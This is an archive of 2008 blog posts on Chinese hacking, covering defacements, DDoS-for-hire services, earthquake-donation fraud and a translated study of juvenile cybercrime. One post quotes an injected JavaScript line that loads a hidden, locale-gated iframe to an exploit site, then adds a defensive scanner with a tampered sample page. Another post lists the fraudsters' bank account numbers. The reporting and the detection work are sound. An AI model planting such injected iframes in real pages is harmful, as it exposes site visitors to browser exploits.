Archive for May, 2008

May 31 2008

Chinese hackers…underachievers! Only responsible for 88% of attacks on Australian government websites.

Published by Heike under Uncategorized

Solid “B” work here guys and not trying to make you feel bad about you…but, making the “could have done better” face in your direction:

CHINESE computer hackers are responsible for 88 per cent of attacks on Australian government web sites, according to web security company TippingPoint.

Read why Chinese hackers can’t break that remaining 12%


May 29 2008

Lose a laptop…get hacked? Sigh…

Published by Heike under US attacks

Not sure if this even qualifies as a post but, whatevah:

Government officials are not confirming a report that Chinese officials may have secretly copied the contents of a government laptop computer during a December visit to China by Commerce Secretary Carlos Gutierrez.

Commerce Secretary Carlos Gutierrez’s visit to China has raised security questions.

The Associated Press said an investigation into the suspected incident also involved whether China used the information to try to hack into Commerce computers.

The AP cited officials and industry experts as sources for the story, which said the surreptitious copying is believed to have occurred when a laptop belonging to someone in the U.S. trade delegation was left unattended.

When asked whether the Commerce Department is looking into the matter, spokesman Richard Mills said, “We take security seriously, and as we learn of concerns about security, we look into them.”

This does continue…


May 29 2008

Then it all went black…Chinese hackers shutting out the lights?

Published by Heike under Uncategorized

I have no words…

Hackers working on behalf of China’s People’s Liberation Army have penetrated networks controlling electric power grids in the United States, computer security experts believe. And that may have precipitated a massive blackout on the east coast in 2003, as well as a blackout in Florida this year.

That’s just one blockbuster assertion in a long story full of them, from National Journal scoopster Shane Harris.

More here…


May 29 2008

Chinese hackers target Sharon Stone

The first calls are starting to make the rounds on Chinese hacker sites to attack the Sharon Stone website. The actress recently started a firestorm in China after she gave an interview suggesting that the earthquake in Sichuan was the result of bad karma. I guessed it would be just a matter of time before Chinese hackers targeted her online and have been monitoring the boards.

One site has posted a bit of initial reconnaissance of the website:

There was also a post asking to have the unofficial website of Sharon Stone hacked:

Tried going to the website for a contact address but found the, “This site may harm your computer” posting. Maybe Jumper will have the time to check it out later.


May 29 2008

Chinese Female Hacker Group

In the male dominated world of Chinese hackers, females find it difficult to be accepted as equals. Their technical skills are often viewed as inferior to their male counterparts.

As far as I am aware, the first group of female Chinese hackers to break this mold were the Six Golden Flowers. The Golden Flowers have since broken up and gone their separate ways, but a new and larger group has taken their place, the Cn (China) Girl Security Team.

The website for the China Girl Security Team was registered on 12 Mar 2007 and currently has 2,217 members. The leader of the group, Xiao Tian, is only 19 years old:

One of Xiao Tian’s chief lieutenants, who goes by the online name of Clever Without Equal (that’s close anyway), is dialed into just about every major Chinese hacker site on her blog:

Also linked through Clever’s blog is Evbs:

She seems to be getting the hang of this hacking thing:


May 28 2008

Tibetan writer’s online ID hijacked

Ordinarily, I’d try to obfuscate text on this subject but since we’re already GFW’d, who cares…

A couple of sites are reporting that the well-known Tibet independence writer Woeser has had all or many of her online accounts hijacked and her website defaced with an anti-splittist message. The Honkers Union of China has taken responsibility.  The honkers have used her Skype account to attempt to contact her associates.  No word if the contact list has been abused to send malware.  Interesting snippet from the article:

The hackers removed the content of the website and replaced it with a gif animation of the Chinese flag with the headline “LONG LIVE THE PEOPLE’S REPUBLIC OF CHINA! “DOWN WITH TIBET INDEPENDENCE!” Below the animation is a photo of Woeser with the words “Please remember this Tibetan separatist Woeser’s ugly face. Whoever sees this ugly face, please beat her hard like one beats a dog.” Further text was added and has apparently been changed several times in the hours since the site was hacked. The website is currently hosted on a server in the United States.

The website is still defaced at the time of this writing.

Top half of the defaced site

Bottom half of the defaced site

 


May 26 2008

In Remembrance

Published by Heike under Uncategorized

flag

On this Memorial Day, I would like to share a letter written from Jessica to her father, CSM James D Blankenbecler.  If it doesn’t bring a tear to your eye, probably nothing will.  God bless all of the men and women who have sacrificed so much for their country!

Jessica’s letter…


May 22 2008

Kunshan Red Cross website compromised

Published by Heike under Hacking for money

According to reports, a detachment from the Shenzhen Public Security Bureau Internet Police organization assisted the Jiangsu Police Department in arresting a male suspect who had hacked into the Kunshan Red Cross website to defraud people donating to victims of the Sichuan earthquake.

A 24 year old suspect, named Yang (from Hubei), was arrested for altering the information on the homepage that listed the phone number and bank account number used to make donations.

In the above shot, I have shown the area the hacker altered.  It is unclear if this is somehow related to the previous incident.


May 21 2008

Chinese hackers…DDoS attack services

Meet Demon Group, an organization that specializes in providing much needed hacking services…their fellow citizens would like to see them dead or jailed…in no particular order or combination.


The screen capture above had to be taken from a Google cache because Demon Group’s website (www.ddosx.cn) seems to have vanished from the interwebs. I have some theories on why it disappeared, which I will share later.

First noticed the group when I found one of their advertisements on Baidu Postings (Large Chinese BBS):

The group claims to provide various types of DDoS attack services on internet cafes, websites, private servers, servers…etc. They sell attack software packages and rent out specialized tools to gather up infected computers (Guaranteed to gather up no fewer than 600-900 in a single day). The contact number provided is QQ:81991.

Demon Group Spams

Demon group, you spam your services…you spam them a lot! You spam them too much! Now you have ticked off a guy named Good Good, he would like to see you go to jail, he has reported you to the INTERNET POLICE!


May 20 2008

Chinese hackers…masters of social engineering

If I were in the business of spotting popular trends, the first thing I would do is hire a Chinese hacker. While the rest of the world is passively watching events unfold around them, Chinese hackers are doing the math on how many people will participate and what online avenues are associated with them…like symbols.

According to an article in tech.ccidnet.com, hackers are using recent events and the patriotism they have inspired to spread a new trojan called, “Red Heart Robber.”  The snatching of the Olympic torch, the CNN incident, and earthquake in Sichuan have caused the Chinese online community to attach red hearts with the Chinese flag (and other variations) to their QQ sig and webpages to show support/sympathy for China.  When normal online users download the image of the red heart flag to show their support for China, a nasty little trojan is attached.

Attacking your own symbol of patriotism…not cool!


May 20 2008

Web sites across China and Taiwan are being hit by a mass SQL injection attack

Published by Heike under Uncategorized

From Computer World:

Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites, according to a security company in Taiwan.

First detected on May 13, the attack is coming from a server farm inside China, which has made no effort to hide its IP addresses, said Wayne Huang, CEO of Armorize Technologies Inc. in Taipei.

“The attack is ongoing,” Huang said. “Even if they can’t successfully insert malware, they’re killing lots of Web sites right now, because they’re just brute-forcing every attack surface with SQL injection, and hence causing lots of permanent changes to the victim Web sites.”

Read more…here


May 19 2008

“Electronic Heroin” an analysis of Chinese juvenile cybercrime (Part II)

Published by Heike under Uncategorized

“Electronic Heroin” an analysis of Chinese juvenile cybercrime (Part I)

Second, analysis on the causes of juvenile cybercrime

What are the reasons for juvenile cybercrime? Adolescents are in puberty, where large changes take place in both physiology and psychology. Individual youth are led down the wrong road and step onto the path of criminality due to individual physiology, psychology and different types of conflicts and contradictions. Additionally, in real life there are unhealthy influences and during the socialization process, deviations and distortions easily occur in individual youth.

  1. As young people mature, there is a conflict between a sense of isolation and an intense feeling of needing to belong. On the internet, they find this compensation in the openness, equality and freedom that make a perfect match for their needs. This makes juveniles the main crowd on the internet. The virtual nature, openness and freedom of the internet permits unrestricted conversations that cause youth to disseminate obscene materials; their morals and sense of responsibility decay; and their awareness of legality is diluted to the point they don’t feel it is a crime. It becomes so serious that they will even break the law.
  2. The current internet legal system is not robust, allowing cybercriminals to act without legal restrictions. Although the country has laid out a series of laws and regulations regarding internet security and punishments for computer crimes, such as the “People’s Republic of China Computer Information Systems Security and Safeguards Regulation,” the current laws are unable to adapt to the current situation of computer development. This is especially true for new internet problems that arise that the law is unable to restrict. This brings about a legal gap.
  3. The unhealthy content on the internet has caused juvenile criminals to bury (hide) hidden dangers. The internet is full of pornography, reactionary (material) and violent information; as well as traps. Understaffed chatroom supervision allows juvenile cybercriminals to bury (hide) inducements. Some managers of underground internet cafes are the ringleaders who entice youth into criminal activity. Some internet cafe managers are only concerned with profit, regardless of the harm the unhealthy information does to the youth, or the youth browsing all manner of pornography, reactionary (material), or violent websites. Some go so far as to supply them with these materials. At the same time, bloody and violent internet games are the hotbed for juvenile cybercrime. Research indicated that long-term playing of bloody and violent online games can cause the user to develop an aggressive personality that leads to criminal activity.
  4. Factors in society, school and the family are also causes of juvenile cybercrime. Some morally corrupt individuals online recklessly spread pornographic and violent images, as well as popular online games that cause segments of the youth to become infatuated with them. They are unable to pay the online game fees so they take risks. The school’s education on ethics and online morality is insufficient. The negative evaluation of weak students, the dislike and discrimination against students with bad behavior causes some students to give up on themselves. They become infatuated with the internet and look there to find self confidence and happiness. Furthermore, the education at home is inappropriate, with parents not strictly supervising their children online. Some parents’ unhealthy personal habits also influence their children.

May 17 2008

Chinese Red Cross Website Hacked to Steal Earthquake Relief Donations

Published by Heike under Hacking for money

Hacker illegally invades section of the official Red Cross website and tampers with solicited donation accounts

Verified by the Ministry of Public Security, a section of the official Red Cross website has been illegally hacked. According to the report, criminal elements gained access to the section of the website that held the special accounts for earthquake disaster relief donations.

An individual named Li Bujiu had opened four fraudulent bank accounts to steal the funding.

The Ningbo Bank released a statement warning all citizens to verify account numbers when making donations. The bank suggested using CCTV, TV, and newspapers as references to verify the accounts.

The falsified accounts were listed as follows:

Opened by Li Yaqiong at the Henan, bank: Agriculture Bank of China, ACCT #: 6228482080560018616;

Opened by Li Bujiu at the Commerce bank, ACCT #: 6222002201101753792;

Opened by Li Bujiu at the Agricultural bank, ACCT #: 6228480150082864813;

Opened by Li Bujiu at the Construction bank, ACCT #: 6227003526450024660;

Opened by Li Bujiu at the Postal Savings Bank, ACCT #: 6221886400011381263;

Opened by Lin Yumin at the Agricultural bank, ACCT#: 9559980150169780312

I think it was Eddie Murphy who once said, “The only reason you would want to do something like this is if you wanted to go straight to hell and not wait in line!”


May 16 2008

“Electronic Heroin” an analysis of Chinese juvenile cybercrime

Published by Heike under Hacking for money, Uncategorized

This is a long article and will need to be done in at least two parts (three?), along with a lot of gisting. It came out yesterday on Chinacourt.org and provides an in-depth look at the drivers pushing juvenile cybercrime in China:

Analysis: Juvenile Cybercrime Causes and Prevention

In the past few years, following the rapid expansion of the internet in our country (China), the internet has become a daily part of many people’s lives and an integral component. According to statistics, in 2007, the number of online users in our country (China) reached 162 million people with juvenile users accounting for 85.8% of that figure. Furthermore, among the country’s juvenile users, 13.2% have become addicts and another 13% manifest internet addiction tendencies. The highest proportion of internet addiction occurs in 17.1% of juvenile users from the ages of 13 to 17. While the internet has the prospect of bringing happiness and creating large amounts of wealth, it also introduces enticements and sin. According to statistical data, 90% of juveniles go online to play games, while the rest use it to chat or browse unhealthy websites. Browsing unhealthy websites and playing online games is either the direct or indirect cause of juvenile crime. This article will analyze the manifestation of juvenile cybercrime, exploring all of the causes that entice it, in order to have a beneficial discussion on countermeasures to prevent juvenile cybercrime.

First, the manifestation and characteristics of juvenile cybercrime:

Following the application and development of computer network technology, the youth have clearly become the majority of internet users and cybercrime has become a new phenomenon of juvenile criminals. Due to the psychological immaturity of youth, they unhesitatingly throw themselves into the internet, becoming excessively dependent and turn into “electronic heroin junkies.” Not only has the internet taken away their thirst for knowledge and kindheartedness, it has also robbed them of their precious youth. From investigations into cybercrime cases over the last couple of years, Chinese juvenile cybercrime manifests itself in these forms:

  1. The internet is used to carry out traditional types of crime such as theft, ransom, injury, fraud, robbery…etc. The virtual nature of the internet provides an artificial space and convenient channel for juveniles to carry out crimes. They can very easily hide their true identity, address…etc, to carry out criminal activity.


May 15 2008

More Patriotic Hacking

Benny from security4all.be sent Heike a link to an article at the Internet Storm Center that covers some patriotic mass SQL-Injection attacks.  The attacker appended this text to the bottom of every compromised index.htm file (this text was copied from the ISC and includes their edits):

“This is a mass invasion.        Safeguard the motherland’s dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com “

Another site that Paul from pauldotcom.com found and contributed to ISC includes obfuscated javascript that includes a function to evaluate if the web browser is configured for PRC/Mainland Chinese - zh-cn.  Anyone who doesn’t have zh-cn gets redirected to a site hosting browser exploits.  Cool.  here is the code snippet from the ISC:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=http://www.ririwow.cn/index.htm width=100 height=0></iframe>");}

This reminds me of the patriotic virus that Heike blogged about a while ago that only exploited machines configured for the traditional Chinese character set (most mainland Chinese use simplified).

Thanks for the heads-up Benny!
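As an added example (not code from the ISC or from this blog), here is a Node.js check a site owner could run over served pages to spot the traits described above: a hidden iframe written by script behind a browser-locale test, or sitting after the closing html tag of a tampered index file. The function names, the 300-character look-back window and the two sample pages are assumptions constructed for illustration.

```javascript
'use strict';

// Attribute values may be quoted, unquoted, or wrapped in typographic quotes.
const QUOTES = `"'\u201c\u201d\u2018\u2019`;

function attr(tag, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*[${QUOTES}]?([^\\s${QUOTES}>]+)`, 'i');
  const m = re.exec(tag);
  return m ? m[1] : null;
}

// Hidden means a zero dimension or CSS that suppresses rendering.
function isHidden(tag) {
  const zero = (v) => v !== null && /^0(px|%)?$/i.test(v);
  return zero(attr(tag, 'height')) || zero(attr(tag, 'width')) ||
    /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag);
}

function scanPage(html) {
  const findings = [];
  const htmlClose = html.search(/<\/html\s*>/i);
  const iframeRe = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = iframeRe.exec(html)) !== null) {
    if (!isHidden(m[0])) continue;
    // Look back a short window for the script context around the tag.
    const before = html.slice(Math.max(0, m.index - 300), m.index);
    const writtenByScript = /document\.write(ln)?\s*\([^)]*$/i.test(before);
    const localeGated =
      /navigator\.(systemLanguage|userLanguage|browserLanguage|language)\b/i.test(before);
    const afterHtmlClose = htmlClose !== -1 && m.index > htmlClose;
    findings.push({
      src: attr(m[0], 'src'),
      offset: m.index,
      writtenByScript,
      localeGated,
      afterHtmlClose,
      // A hidden iframe alone can be a legitimate tracker; the extra
      // traits are what make it look like injected content.
      severity: (writtenByScript && localeGated) || afterHtmlClose ? 'high' : 'review',
    });
  }
  return findings;
}

// Constructed sample pages (placeholder domains, not taken from the post).
const CLEAN = '<html><body><iframe src="https://video.example.invalid/embed" ' +
  'width="560" height="315"></iframe></body></html>';
const TAMPERED = '<html><body><p>News</p></body></html>\n' +
  "<script>if (navigator.systemLanguage=='zh-cn'){}else{document.writeln(\"<iframe " +
  'src=http://redirect.example.invalid/index.htm width=100 height=0></iframe>");}</script>';

for (const [name, page] of [['clean', CLEAN], ['tampered', TAMPERED]]) {
  console.log(name, JSON.stringify(scanPage(page)));
}
```

Because mass SQL injection usually lands in database fields that are later rendered, the same scan is more useful against the rendered pages or the stored text columns than against static files alone.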

